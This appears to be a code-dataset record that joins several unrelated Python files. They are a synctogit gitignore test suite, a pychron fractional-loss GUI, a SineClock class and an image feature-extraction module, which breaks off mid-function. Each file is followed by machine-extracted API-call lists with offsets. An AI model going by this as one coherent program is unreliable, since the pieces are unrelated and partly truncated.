gitignore_file.write_text(".synctogit*")
else:
gitignore_file.write_text("*.something")
call_git("git init", cwd=d)
call_git("git add .", cwd=d)
call_git('git commit -m "The Cake is a lie"', cwd=d)
git = git_factory(d)
if is_up_to_date:
assert git.head.commit.summary == "The Cake is a lie"
else:
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
assert gitignore_file.read_text() == (
# fmt: off
"*.something\n"
".synctogit*\n"
# fmt: on
)
@pytest.mark.parametrize("dirty", ["repo", "gitignore"])
@pytest.mark.parametrize("is_dirty_staged", [False, True])
@pytest.mark.parametrize("is_new_file", [False, True])
def test_gitignore_update_with_dirty_repo(
call_git, temp_dir, dirty, is_dirty_staged, is_new_file
):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
gitignore_file = p / ".gitignore"
if dirty == "gitignore":
dirty_file = gitignore_file
elif dirty == "repo":
dirty_file = p / ".lalalala"
call_git("git init", cwd=d)
if not is_new_file:
dirty_file.write_text("*.pdf")
call_git("git add .", cwd=d)
call_git('git commit --allow-empty -m "The Cake is a lie"', cwd=d)
dirty_file.write_text("*.something")
if is_dirty_staged:
call_git("git add .", cwd=d)
with ExitStack() as stack:
if dirty == "gitignore":
stack.enter_context(pytest.raises(GitError))
git = git_factory(d)
dirty_file.read_text() == "*.something"
if dirty == "gitignore":
# No commits should be created
git_commits = call_git(r'git log --all --pretty=format:"%D %s" -n 2', cwd=d)
assert git_commits == ("HEAD -> master The Cake is a lie")
elif dirty == "repo":
# Dirty changes should be there and still not be committed.
gitignore_file.read_text() == ".synctogit*\n"
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
# Only .gitignore should be committed
git_show = call_git('git show --pretty="" --name-only', cwd=d)
assert git_show == ".gitignore"
# Ensure that the dirty files are in the same staged/unstaged state
git_status = call_git("git status --porcelain", cwd=d, space_trim=False)
if is_new_file:
prefix = "A " if is_dirty_staged else "?? "
else:
prefix = "M " if is_dirty_staged else " M "
assert git_status.startswith(prefix)
| [
"pathlib.Path",
"synctogit.git_factory.git_factory",
"pytest.mark.parametrize",
"pytest.raises",
"os.mkdir",
"contextlib.ExitStack"
] | [((480, 600), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""remote_name, remote"""', "[('origin', None), ('angel', '<EMAIL>:KostyaEsmukov/SyncToGit.git')]"], {}), "('remote_name, remote', [('origin', None), ('angel',\n '<EMAIL>:KostyaEsmukov/SyncToGit.git')])\n", (503, 600), False, 'import pytest\n'), ((2068, 2362), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""remote_name, remote, shadow_remote"""', "[('origin', None, None), ('angel', '<EMAIL>:KostyaEsmukov/SyncToGit.git',\n None), ('angel', '<EMAIL>:new/remote.git', 'git<EMAIL>:old/remote.git'),\n ('angel', 'git<EMAIL>:same/remote.git', 'git<EMAIL>:same/remote.git')]"], {}), "('remote_name, remote, shadow_remote', [('origin',\n None, None), ('angel', '<EMAIL>:KostyaEsmukov/SyncToGit.git', None), (\n 'angel', '<EMAIL>:new/remote.git', 'git<EMAIL>:old/remote.git'), (\n 'angel', 'git<EMAIL>:same/remote.git', 'git<EMAIL>:same/remote.git')])\n", (2091, 2362), False, 'import pytest\n'), ((4003, 4058), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""is_up_to_date"""', '[False, True]'], {}), "('is_up_to_date', [False, True])\n", (4026, 4058), False, 'import pytest\n'), ((4951, 5006), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""dirty"""', "['repo', 'gitignore']"], {}), "('dirty', ['repo', 'gitignore'])\n", (4974, 5006), False, 'import pytest\n'), ((5008, 5065), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""is_dirty_staged"""', '[False, True]'], {}), "('is_dirty_staged', [False, True])\n", (5031, 5065), False, 'import pytest\n'), ((5067, 5120), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""is_new_file"""', '[False, True]'], {}), "('is_new_file', [False, True])\n", (5090, 5120), False, 'import pytest\n'), ((811, 822), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (819, 822), False, 'import os\n'), ((827, 896), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {'branch': 'branch', 'remote_name': 'remote_name', 'remote': 
'remote'}), '(d, branch=branch, remote_name=remote_name, remote=remote)\n', (838, 896), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((1697, 1708), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (1705, 1708), False, 'import os\n'), ((1942, 1953), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (1950, 1953), False, 'import os\n'), ((2552, 2563), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (2560, 2563), False, 'import os\n'), ((4176, 4187), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (4184, 4187), False, 'import os\n'), ((4490, 4504), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (4501, 4504), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((5280, 5291), 'os.mkdir', 'os.mkdir', (['d'], {}), '(d)\n', (5288, 5291), False, 'import os\n'), ((429, 452), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (442, 452), False, 'import pytest\n'), ((462, 476), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (473, 476), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((1652, 1666), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (1656, 1666), False, 'from pathlib import Path\n'), ((1782, 1805), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (1795, 1805), False, 'import pytest\n'), ((1828, 1842), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (1839, 1842), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((1996, 2019), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (2009, 2019), False, 'import pytest\n'), ((2050, 2064), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (2061, 2064), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((2507, 2521), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (2511, 2521), False, 'from pathlib import Path\n'), ((2855, 2866), 'contextlib.ExitStack', 
'ExitStack', ([], {}), '()\n', (2864, 2866), False, 'from contextlib import ExitStack\n'), ((3002, 3056), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {'remote_name': 'remote_name', 'remote': 'remote'}), '(d, remote_name=remote_name, remote=remote)\n', (3013, 3056), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((3483, 3506), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (3496, 3506), False, 'import pytest\n'), ((3516, 3558), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {'branch': '"""some-other-branch"""'}), "(d, branch='some-other-branch')\n", (3527, 3558), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((3613, 3627), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (3617, 3627), False, 'from pathlib import Path\n'), ((4131, 4145), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (4135, 4145), False, 'from pathlib import Path\n'), ((5235, 5249), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (5239, 5249), False, 'from pathlib import Path\n'), ((5779, 5790), 'contextlib.ExitStack', 'ExitStack', ([], {}), '()\n', (5788, 5790), False, 'from contextlib import ExitStack\n'), ((5905, 5919), 'synctogit.git_factory.git_factory', 'git_factory', (['d'], {}), '(d)\n', (5916, 5919), False, 'from synctogit.git_factory import GitError, git_factory\n'), ((383, 397), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (387, 397), False, 'from pathlib import Path\n'), ((780, 794), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (784, 794), False, 'from pathlib import Path\n'), ((1911, 1925), 'pathlib.Path', 'Path', (['temp_dir'], {}), '(temp_dir)\n', (1915, 1925), False, 'from pathlib import Path\n'), ((2963, 2986), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (2976, 2986), False, 'import pytest\n'), ((5866, 5889), 'pytest.raises', 'pytest.raises', (['GitError'], {}), '(GitError)\n', (5879, 5889), False, 
'import pytest\n')] |
# ===============================================================================
# Copyright 2019 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from numpy import linspace
from traits.api import HasTraits, Int, Float, Instance, on_trait_change
from traitsui.api import View, VGroup, UItem, Item, HGroup
from pychron.graph.graph import Graph
from pychron.processing.argon_calculations import calculate_fractional_loss
class FractionalLossCalculator(HasTraits):
graph = Instance(Graph)
temp = Float(475)
min_age = Int(1)
max_age = Int(1000)
radius = Float(0.1)
def __init__(self, *args, **kw):
super(FractionalLossCalculator, self).__init__(*args, **kw)
self.graph = g = Graph()
g.new_plot()
xs, ys = self._calculate_data()
g.new_series(xs, ys)
def _calculate_data(self):
xs = linspace(self.min_age, self.max_age)
fs = [calculate_fractional_loss(ti, self.temp, self.radius) for ti in xs]
return xs, fs
@on_trait_change("temp, radius, max_age, min_age")
def _replot(self):
xs, ys = self._calculate_data()
self.graph.set_data(xs)
self.graph.set_data(ys, axis=1)
def traits_view(self):
a = HGroup(Item("temp"), Item("radius"), Item("min_age"), Item("max_age"))
v = View(VGroup(a, UItem("graph", style="custom")))
return v
if __name__ == "__main__":
f = FractionalLossCalculator()
f.configure_traits()
# ============= EOF =============================================
| [
"traits.api.Instance",
"traits.api.on_trait_change",
"pychron.graph.graph.Graph",
"traitsui.api.Item",
"numpy.linspace",
"traits.api.Int",
"traitsui.api.UItem",
"pychron.processing.argon_calculations.calculate_fractional_loss",
"traits.api.Float"
] | [((1058, 1073), 'traits.api.Instance', 'Instance', (['Graph'], {}), '(Graph)\n', (1066, 1073), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1085, 1095), 'traits.api.Float', 'Float', (['(475)'], {}), '(475)\n', (1090, 1095), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1110, 1116), 'traits.api.Int', 'Int', (['(1)'], {}), '(1)\n', (1113, 1116), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1131, 1140), 'traits.api.Int', 'Int', (['(1000)'], {}), '(1000)\n', (1134, 1140), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1154, 1164), 'traits.api.Float', 'Float', (['(0.1)'], {}), '(0.1)\n', (1159, 1164), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1588, 1637), 'traits.api.on_trait_change', 'on_trait_change', (['"""temp, radius, max_age, min_age"""'], {}), "('temp, radius, max_age, min_age')\n", (1603, 1637), False, 'from traits.api import HasTraits, Int, Float, Instance, on_trait_change\n'), ((1297, 1304), 'pychron.graph.graph.Graph', 'Graph', ([], {}), '()\n', (1302, 1304), False, 'from pychron.graph.graph import Graph\n'), ((1441, 1477), 'numpy.linspace', 'linspace', (['self.min_age', 'self.max_age'], {}), '(self.min_age, self.max_age)\n', (1449, 1477), False, 'from numpy import linspace\n'), ((1492, 1545), 'pychron.processing.argon_calculations.calculate_fractional_loss', 'calculate_fractional_loss', (['ti', 'self.temp', 'self.radius'], {}), '(ti, self.temp, self.radius)\n', (1517, 1545), False, 'from pychron.processing.argon_calculations import calculate_fractional_loss\n'), ((1821, 1833), 'traitsui.api.Item', 'Item', (['"""temp"""'], {}), "('temp')\n", (1825, 1833), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n'), ((1835, 1849), 'traitsui.api.Item', 'Item', (['"""radius"""'], {}), "('radius')\n", (1839, 1849), False, 'from traitsui.api 
import View, VGroup, UItem, Item, HGroup\n'), ((1851, 1866), 'traitsui.api.Item', 'Item', (['"""min_age"""'], {}), "('min_age')\n", (1855, 1866), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n'), ((1868, 1883), 'traitsui.api.Item', 'Item', (['"""max_age"""'], {}), "('max_age')\n", (1872, 1883), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n'), ((1912, 1942), 'traitsui.api.UItem', 'UItem', (['"""graph"""'], {'style': '"""custom"""'}), "('graph', style='custom')\n", (1917, 1942), False, 'from traitsui.api import View, VGroup, UItem, Item, HGroup\n')] |
import math
from inputs.sine import Sine
from inputs.timeElapsed import TimeElapsed
from utils.number import Number
class SineClock(Number):
def __init__(self, sine: Sine):
self.__sine = sine
self.__elapsed = TimeElapsed()
def get(self):
return self.__sine.at_time(self.__elapsed.get())
| [
"inputs.timeElapsed.TimeElapsed"
] | [((232, 245), 'inputs.timeElapsed.TimeElapsed', 'TimeElapsed', ([], {}), '()\n', (243, 245), False, 'from inputs.timeElapsed import TimeElapsed\n')] |
# main imports
import numpy as np
import sys
# image transform imports
from PIL import Image
from skimage import color
from sklearn.decomposition import FastICA
from sklearn.decomposition import IncrementalPCA
from sklearn.decomposition import TruncatedSVD
from numpy.linalg import svd as lin_svd
from scipy.signal import medfilt2d, wiener, cwt
import pywt
import cv2
from ipfml.processing import transform, compression, segmentation
from ipfml.filters import convolution, kernels
from ipfml import utils
# modules and config imports
sys.path.insert(0, '') # trick to enable import of main folder module
import custom_config as cfg
from modules.utils import data as dt
def get_image_features(data_type, block):
"""
Method which returns the data type expected
"""
if data_type == 'lab':
block_file_path = '/tmp/lab_img.png'
block.save(block_file_path)
data = transform.get_LAB_L_SVD_s(Image.open(block_file_path))
if data_type == 'mscn':
img_mscn_revisited = transform.rgb_to_mscn(block)
# save tmp as img
img_output = Image.fromarray(img_mscn_revisited.astype('uint8'), 'L')
mscn_revisited_file_path = '/tmp/mscn_revisited_img.png'
img_output.save(mscn_revisited_file_path)
img_block = Image.open(mscn_revisited_file_path)
# extract from temp image
data = compression.get_SVD_s(img_block)
"""if data_type == 'mscn':
img_gray = np.array(color.rgb2gray(np.asarray(block))*255, 'uint8')
img_mscn = transform.calculate_mscn_coefficients(img_gray, 7)
img_mscn_norm = transform.normalize_2D_arr(img_mscn)
img_mscn_gray = np.array(img_mscn_norm*255, 'uint8')
data = compression.get_SVD_s(img_mscn_gray)
"""
if data_type == 'low_bits_6':
low_bits_6 = transform.rgb_to_LAB_L_low_bits(block, 6)
data = compression.get_SVD_s(low_bits_6)
if data_type == 'low_bits_5':
low_bits_5 = transform.rgb_to_LAB_L_low_bits(block, 5)
data = compression.get_SVD_s(low_bits_5)
if data_type == 'low_bits_4':
low_bits_4 = transform.rgb_to_LAB_L_low_bits(block, 4)
data = compression.get_SVD_s(low_bits_4)
if data_type == 'low_bits_3':
low_bits_3 = transform.rgb_to_LAB_L_low_bits(block, 3)
data = compression.get_SVD_s(low_bits_3)
if data_type == 'low_bits_2':
low_bits_2 = transform.rgb_to_LAB_L_low_bits(block, 2)
data = compression.get_SVD_s(low_bits_2)
if data_type == 'low_bits_4_shifted_2':
data = compression.get_SVD_s(transform.rgb_to_LAB_L_bits(block, (3, 6)))
if data_type == 'sub_blocks_stats':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 4), int(height / 4)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
# get information we want from svd
data.append(np.mean(l_svd_data))
data.append(np.median(l_svd_data))
data.append(np.percentile(l_svd_data, 25))
data.append(np.percentile(l_svd_data, 75))
data.append(np.var(l_svd_data))
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=100)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_stats_reduced':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 4), int(height / 4)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
# get information we want from svd
data.append(np.mean(l_svd_data))
data.append(np.median(l_svd_data))
data.append(np.percentile(l_svd_data, 25))
data.append(np.percentile(l_svd_data, 75))
data.append(np.var(l_svd_data))
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_area':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 8), int(height / 8)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=50)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_area_normed':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 8), int(height / 8)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
l_svd_data = utils.normalize_arr(l_svd_data)
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=50)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'mscn_var_4':
data = _get_mscn_variance(block, (100, 100))
if data_type == 'mscn_var_16':
data = _get_mscn_variance(block, (50, 50))
if data_type == 'mscn_var_64':
data = _get_mscn_variance(block, (25, 25))
if data_type == 'mscn_var_16_max':
data = _get_mscn_variance(block, (50, 50))
data = np.asarray(data)
size = int(len(data) / 4)
indices = data.argsort()[-size:][::-1]
data = data[indices]
if data_type == 'mscn_var_64_max':
data = _get_mscn_variance(block, (25, 25))
data = np.asarray(data)
size = int(len(data) / 4)
indices = data.argsort()[-size:][::-1]
data = data[indices]
if data_type == 'ica_diff':
current_image = transform.get_LAB_L(block)
ica = FastICA(n_components=50)
ica.fit(current_image)
image_ica = ica.fit_transform(current_image)
image_restored = ica.inverse_transform(image_ica)
final_image = utils.normalize_2D_arr(image_restored)
final_image = np.array(final_image * 255, 'uint8')
sv_values = utils.normalize_arr(compression.get_SVD_s(current_image))
ica_sv_values = utils.normalize_arr(compression.get_SVD_s(final_image))
data = abs(np.array(sv_values) - np.array(ica_sv_values))
if data_type == 'svd_trunc_diff':
current_image = transform.get_LAB_L(block)
svd = TruncatedSVD(n_components=30, n_iter=100, random_state=42)
transformed_image = svd.fit_transform(current_image)
restored_image = svd.inverse_transform(transformed_image)
reduced_image = (current_image - restored_image)
U, s, V = compression.get_SVD(reduced_image)
data = s
if data_type == 'ipca_diff':
current_image = transform.get_LAB_L(block)
transformer = IncrementalPCA(n_components=20, batch_size=25)
transformed_image = transformer.fit_transform(current_image)
restored_image = transformer.inverse_transform(transformed_image)
reduced_image = (current_image - restored_image)
U, s, V = compression.get_SVD(reduced_image)
data = s
if data_type == 'svd_reconstruct':
reconstructed_interval = (90, 200)
begin, end = reconstructed_interval
lab_img = transform.get_LAB_L(block)
lab_img = np.array(lab_img, 'uint8')
U, s, V = lin_svd(lab_img, full_matrices=True)
smat = np.zeros((end-begin, end-begin), dtype=complex)
smat[:, :] = np.diag(s[begin:end])
output_img = np.dot(U[:, begin:end], np.dot(smat, V[begin:end, :]))
output_img = np.array(output_img, 'uint8')
data = compression.get_SVD_s(output_img)
if 'sv_std_filters' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
# with the use of wavelet
if 'wave_sv_std_filters' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
images.append(medfilt2d(arr, [3, 3]))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
# with the use of wavelet
if 'sv_std_filters_full' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
kernel = np.ones((3,3),np.float32)/9
images.append(cv2.filter2D(arr,-1,kernel))
kernel = np.ones((5,5),np.float32)/25
images.append(cv2.filter2D(arr,-1,kernel))
images.append(cv2.GaussianBlur(arr, (3, 3), 0.5))
images.append(cv2.GaussianBlur(arr, (3, 3), 1))
images.append(cv2.GaussianBlur(arr, (3, 3), 1.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 0.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 1))
images.append(cv2.GaussianBlur(arr, (5, 5), 1.5))
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
wave = w2d(arr, 'db1', 2)
images.append(np.array(wave, 'float64'))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
if 'sv_entropy_std_filters' in data_type:
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
kernel = np.ones((3,3),np.float32)/9
images.append(cv2.filter2D(arr,-1,kernel))
kernel = np.ones((5,5),np.float32)/25
images.append(cv2.filter2D(arr,-1,kernel))
images.append(cv2.GaussianBlur(arr, (3, 3), 0.5))
images.append(cv2.GaussianBlur(arr, (3, 3), 1))
images.append(cv2.GaussianBlur(arr, (3, 3), 1.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 0.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 1))
images.append(cv2.GaussianBlur(arr, (5, 5), 1.5))
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
wave = w2d(arr, 'db1', 2)
images.append(np.array(wave, 'float64'))
sv_vector = []
sv_entropy_list = []
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_entropy = [utils.get_entropy_contribution_of_i(s, id_sv) for id_sv, sv in enumerate(s)]
sv_entropy_list.append(sv_entropy)
sv_std = []
sv_array = np.array(sv_vector)
_, length = sv_array.shape
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
s_arr = compression.get_SVD_s(arr)
data = s_arr[indices]
if 'convolutional_kernels' in data_type:
sub_zones = segmentation.divide_in_blocks(block, (20, 20))
data = []
diff_std_list_3 = []
diff_std_list_5 = []
diff_mean_list_3 = []
diff_mean_list_5 = []
plane_std_list_3 = []
plane_std_list_5 = []
plane_mean_list_3 = []
plane_mean_list_5 = []
plane_max_std_list_3 = []
plane_max_std_list_5 = []
plane_max_mean_list_3 = []
plane_max_mean_list_5 = []
for sub_zone in sub_zones:
l_img = transform.get_LAB_L(sub_zone)
normed_l_img = utils.normalize_2D_arr(l_img)
# bilateral with window of size (3, 3)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (3, 3))
std_diff = np.std(normed_diff)
mean_diff = np.mean(normed_diff)
diff_std_list_3.append(std_diff)
diff_mean_list_3.append(mean_diff)
# bilateral with window of size (5, 5)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (5, 5))
std_diff = np.std(normed_diff)
mean_diff = np.mean(normed_diff)
diff_std_list_5.append(std_diff)
diff_mean_list_5.append(mean_diff)
# plane mean with window of size (3, 3)
normed_plane_mean = convolution.convolution2D(normed_l_img, kernels.plane_mean, (3, 3))
std_plane_mean = np.std(normed_plane_mean)
mean_plane_mean = np.mean(normed_plane_mean)
plane_std_list_3.append(std_plane_mean)
plane_mean_list_3.append(mean_plane_mean)
# plane mean with window of size (5, 5)
normed_plane_mean = convolution.convolution2D(normed_l_img, kernels.plane_mean, (5, 5))
std_plane_mean = np.std(normed_plane_mean)
mean_plane_mean = np.mean(normed_plane_mean)
plane_std_list_5.append(std_plane_mean)
plane_mean_list_5.append(mean_plane_mean)
# plane max error with window of size (3, 3)
normed_plane_max = convolution.convolution2D(normed_l_img, kernels.plane_max_error, (3, 3))
std_plane_max = np.std(normed_plane_max)
mean_plane_max = np.mean(normed_plane_max)
plane_max_std_list_3.append(std_plane_max)
plane_max_mean_list_3.append(mean_plane_max)
# plane max error with window of size (5, 5)
normed_plane_max = convolution.convolution2D(normed_l_img, kernels.plane_max_error, (5, 5))
std_plane_max = np.std(normed_plane_max)
mean_plane_max = np.mean(normed_plane_max)
plane_max_std_list_5.append(std_plane_max)
plane_max_mean_list_5.append(mean_plane_max)
diff_std_list_3 = np.array(diff_std_list_3)
diff_std_list_5 = np.array(diff_std_list_5)
diff_mean_list_3 = np.array(diff_mean_list_3)
diff_mean_list_5 = np.array(diff_mean_list_5)
plane_std_list_3 = np.array(plane_std_list_3)
plane_std_list_5 = np.array(plane_std_list_5)
plane_mean_list_3 = np.array(plane_mean_list_3)
plane_mean_list_5 = np.array(plane_mean_list_5)
plane_max_std_list_3 = np.array(plane_max_std_list_3)
plane_max_std_list_5 = np.array(plane_max_std_list_5)
plane_max_mean_list_3 = np.array(plane_max_mean_list_3)
plane_max_mean_list_5 = np.array(plane_max_mean_list_5)
if 'std_max_blocks' in data_type:
data.append(np.std(diff_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_mean_list_5[0:int(len(sub_zones)/5)]))
if 'mean_max_blocks' in data_type:
data.append(np.mean(diff_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_mean_list_5[0:int(len(sub_zones)/5)]))
if 'std_normed' in data_type:
data.append(np.std(diff_std_list_3))
